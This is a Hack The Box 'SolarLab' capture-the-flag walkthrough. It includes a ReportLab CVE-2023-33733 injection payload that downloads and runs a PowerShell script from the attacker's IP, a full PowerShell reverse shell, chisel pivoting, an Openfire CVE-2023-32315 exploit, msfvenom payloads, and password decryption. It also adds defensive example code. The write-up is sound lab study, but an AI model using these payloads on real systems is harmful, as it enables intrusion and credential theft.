HTB - SolarLab [Medium]
TCP Scan
> TARGET=10.129.61.108 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
6791/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- add /etc/hosts entries
echo '10.129.61.108 solarlab.htb report.solarlab.htb' >> /etc/hosts
enum
- enum4linux
> enum4linux solarlab.htb
[x]
- subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://solarlab.htb/" -H "Host: FUZZ.solarlab.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
- dirsearch
dirsearch -u http://solarlab.htb/
[17:22:14] 403 - 555B - /assets/
[17:22:14] 301 - 169B - /assets -> http://solarlab.htb/assets/
[17:22:42] 301 - 169B - /images -> http://solarlab.htb/images/
[17:22:42] 403 - 555B - /images/
- smb
smbclient -N -L \\solarlab.htb
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
smbclient -N //solarlab.htb/Documents
- passwords found in details-file.xlsx
Alexander.knight@gmail.com al;ksdhfewoiuh
KAlexander dkjafblkjadsfgl
Alexander.knight@gmail.com d398sadsknr390
blake.byte ThisCanB3typedeasily1@
AlexanderK danenacia9234n
ClaudiaS dadsfawe9dafkn
report.solarlab.htb:6791
- some guesswork is needed to log in with the passwords above; the working pair is blakeb:ThisCanB3typedeasily1@
hydra -C creds.txt report.solarlab.htb -s 6791 http-post-form "/login:username=^USER^&password=^PASS^:F=not"
[x]
- generate a leave request at http://report.solarlab.htb:6791/leaveRequest and inspect the PDF
> strings output.pdf
% ReportLab generated PDF document -- digest (http://www.reportlab.com)
- look for vulnerabilities in ReportLab, found: https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897
- https://github.com/c53elyas/CVE-2023-33733/blob/master/code-injection-poc/poc.py
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.88/shell.ps1")') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
- the travelApprovalForm field can be used for RCE: try the payload above and set up a reverse shell
$client = New-Object System.Net.Sockets.TCPClient("ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- request payload
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell.exe IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.88/shell.ps1\')') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>
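The payload above works because vulnerable ReportLab versions hand an unrecognised string in the `color` attribute of Paragraph markup to an expression evaluator (CVE-2023-33733, fixed upstream in ReportLab 3.6.13). Upgrading is the primary fix; the gatekeeper below is an added example, not code from the writeup or from ReportLab, showing the defence-in-depth layer an application should keep regardless: only colour literals are allowed through before user-supplied markup reaches `Paragraph()`. The names `NAMED_COLORS`, `audit_para_markup` and `render_or_reject` are this example's own, and the sample payload is a constructed excerpt shaped like the one above.

```python
"""Added example: reject anything but colour literals in Paragraph markup."""
import re
from html.parser import HTMLParser

# Conservative allow-list; extend with further CSS names as your templates need.
NAMED_COLORS = {
    "black", "white", "red", "green", "blue", "yellow", "gray", "grey",
    "orange", "purple", "navy", "teal", "silver", "maroon",
}
# #rgb, #rrggbb or #rrggbbaa hex literals
HEX_COLOR = re.compile(r"^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})$")
# attribute names that ReportLab paragraph markup treats as colours
COLOR_ATTRS = {"color", "backcolor", "bgcolor", "textcolor",
               "strokecolor", "fillcolor"}


def is_safe_color(value):
    """True only for a bare colour name or a hex literal. Anything that looks
    like an expression (brackets, quotes, parentheses) fails the grammar."""
    v = value.strip()
    return v.lower() in NAMED_COLORS or bool(HEX_COLOR.match(v))


class _ColorAuditor(HTMLParser):
    """Collect every colour attribute whose value is not a plain literal."""

    def __init__(self):
        super().__init__()
        self.violations = []  # (tag, attribute, value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in COLOR_ATTRS and not is_safe_color(value or ""):
                self.violations.append((tag, name, value))


def audit_para_markup(markup):
    """Return a list of (tag, attr, value) for unsafe colour attributes.
    An empty list means the markup is safe to hand to Paragraph()."""
    auditor = _ColorAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.violations


def render_or_reject(markup):
    """Call this instead of Paragraph(markup, style) on user-supplied text.
    Returns the markup unchanged when clean, raises ValueError otherwise."""
    violations = audit_para_markup(markup)
    if violations:
        tag, attr, _ = violations[0]
        raise ValueError(f"rejected {attr!r} on <{tag}>: not a colour literal")
    return markup


# Constructed samples: the shape of the writeup's payload, and a benign one.
PAYLOAD = ("<para><font color=\"[ [ getattr(pow,Word('__globals__'))['os'] "
           "for Word in [x] ] and 'red'\">exploit</font></para>")
BENIGN = '<para><font color="#1a2b3c">Leave request approved</font></para>'

if __name__ == "__main__":
    print(audit_para_markup(BENIGN))   # []
    print(audit_para_markup(PAYLOAD))  # one violation on <font color>
```

The check is deliberately an allow-list: trying to deny-list `getattr`, `__globals__` or `[` would only invite the next bypass, whereas a colour grammar of names and hex literals leaves no room for an expression at all.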
- get user flag
PS C:\Users\blake\desktop> type user.txt
f97f5b91b4a9b1a368805946dc7c36ac
root
- found a db file
PS C:\users\blake\documents\app\reports\instance> ls
Directory: C:\users\blake\documents\app\reports\instance
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/17/2023 12:11 PM 12288 users.db
- it is a small file, so base64-encode it for transfer
$content = Get-Content -Path 'users.db' -Encoding Byte
$base64 = [Convert]::ToBase64String($content)
$base64 | Set-Content -Path 'output.txt'
Get-Content -Path 'output.txt'
- get the password for alexanderk: HotP!fireguard
sqlite> select * from user;
1|BlakeB|BlakeB
2|ClaudiaS|ClaudiaS
3|AlexanderK|ClaudiaS
4|blakeb|ThisCanB3typedeasily1@
5|claudias|007poiuytrewq
6|alexanderk|HotP!fireguard
- there is an instance of Openfire running on 9090
> netstat -ano
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5976
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 904
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 364
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:6791 0.0.0.0:0 LISTENING 5976
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 532
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 316
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1544
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 652
TCP 10.129.61.108:139 0.0.0.0:0 LISTENING 4
TCP 10.129.61.108:55186 10.10.14.88:4444 ESTABLISHED 5324
TCP 127.0.0.1:5000 0.0.0.0:0 LISTENING 5924
TCP 127.0.0.1:5222 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5223 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5262 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5263 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5269 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5270 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5275 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:5276 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:7070 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:7443 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2988
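The netstat listing above is where the loopback-bound Openfire console shows up. Services bound only to 127.0.0.1 never appear in an external port scan, so they tend to be patched and monitored less, yet anyone with a shell on the host can reach them. The parser below is an added example, not part of the writeup: it splits `netstat -ano` output into loopback-only listeners, externally exposed listeners, listeners per PID, and established connections to a remote peer (the last is what a reverse shell like the one on port 4444 looks like from the host side). The sample text is a constructed excerpt modelled on the output above, and the function names are this example's own.

```python
"""Added example: triage `netstat -ano` output for exposure and odd peers."""
from collections import defaultdict

# Constructed excerpt modelled on the writeup's netstat output.
SAMPLE_NETSTAT = """\
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5976
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:6791 0.0.0.0:0 LISTENING 5976
TCP 10.129.61.108:55186 10.10.14.88:4444 ESTABLISHED 5324
TCP 127.0.0.1:5000 0.0.0.0:0 LISTENING 5924
TCP 127.0.0.1:5222 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2988
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2988
TCP [::]:135 [::]:0 LISTENING 904
TCP [::1]:9090 [::]:0 LISTENING 2988
UDP 0.0.0.0:5353 *:* 1552
"""


def split_endpoint(endpoint):
    """'127.0.0.1:9090' -> ('127.0.0.1', 9090); '[::1]:9090' -> ('::1', 9090)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def is_loopback(host):
    return host.startswith("127.") or host == "::1"


def parse_netstat(text):
    """Return one dict per TCP row (UDP rows carry no state and are skipped)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        lhost, lport = split_endpoint(parts[1])
        rhost, rport = split_endpoint(parts[2])
        rows.append({"lhost": lhost, "lport": lport, "rhost": rhost,
                     "rport": rport, "state": parts[3], "pid": int(parts[4])})
    return rows


def loopback_only_ports(rows):
    """Ports whose every LISTENING bind is a loopback address."""
    binds = defaultdict(set)
    for r in rows:
        if r["state"] == "LISTENING":
            binds[r["lport"]].add(r["lhost"])
    return sorted(p for p, hosts in binds.items()
                  if all(is_loopback(h) for h in hosts))


def exposed_ports(rows):
    """Ports with at least one non-loopback LISTENING bind (wildcard or NIC)."""
    loop = set(loopback_only_ports(rows))
    return sorted({r["lport"] for r in rows
                   if r["state"] == "LISTENING" and r["lport"] not in loop})


def listeners_by_pid(rows):
    """Map PID -> sorted listening ports, to see which process owns a cluster."""
    out = defaultdict(set)
    for r in rows:
        if r["state"] == "LISTENING":
            out[r["pid"]].add(r["lport"])
    return {pid: sorted(ports) for pid, ports in out.items()}


def remote_established(rows):
    """ESTABLISHED connections whose peer is another host: the first thing to
    check when a process should not be talking outbound at all."""
    return [(r["lhost"], r["lport"], r["rhost"], r["rport"], r["pid"])
            for r in rows
            if r["state"] == "ESTABLISHED" and not is_loopback(r["rhost"])]


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("loopback only:", loopback_only_ports(rows))
    print("exposed:", exposed_ports(rows))
    print("remote peers:", remote_established(rows))
```

Grouping by PID is what turns a wall of ports into a story: one process owning 5222, 5269, 7070, 9090 and 9091 is an XMPP server with its admin console, and that is the process whose version and patch level a defender should confirm even though nothing about it is visible from outside.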
- prepare chisel for pivoting
PS C:\users\blake\desktop> curl http://10.10.14.88/chisel.exe -o chisel.exe
# On Kali
> chisel server -p 9999 --reverse
# update /etc/proxychains.conf
# comment out `proxy_dns` for nmap to work
socks5 127.0.0.1 <sock-port>
# On Pivot
# for specific port forwarding
.\chisel client --max-retry-count=1 10.10.14.88:9999 R:9090:localhost:9090
- found Openfire, Version: 4.7.4, vulnerable to https://github.com/miko550/CVE-2023-32315
> python3 CVE-2023-32315.py -t http://localhost:9090
Successfully retrieved JSESSIONID: node01bx31xpd0ogwb1hk51dnprk3is2.node0 + csrf: CO5C3JDciafMtKn
User added successfully: url: http://localhost:9090 username: nnf2la password: 0eojze
- follow the instructions in the readme to upload a plugin for RCE
- create a reverse shell and upload to c:\users\public\
> msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.88 LPORT=5555 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
# call the shell on the plugin page
> c:\users\public\shell.exe
> rlwrap nc -vnlp 5555
listening on [any] 5555 ...
connect to [10.10.14.88] from (UNKNOWN) [10.129.61.108] 55285
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\Openfire\bin>whoami
whoami
solarlab\openfire
- find the embedded DB in the Openfire directory
C:\Program Files\Openfire\embedded-db>type openfire.script
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
- use openfire password decrypter: https://github.com/c0rdis/openfire_decrypt?tab=readme-ov-file
> java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
- admin password: ThisPasswordShouldDo!@
> $SecPassword = ConvertTo-SecureString 'ThisPasswordShouldDo!@' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
> $session = New-PSSession -Credential $Cred
> Invoke-Command -Session $session -scriptblock { type c:\users\administrator\desktop\root.txt }
3d5d56bc9bdffdf24e85212c1387503d
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack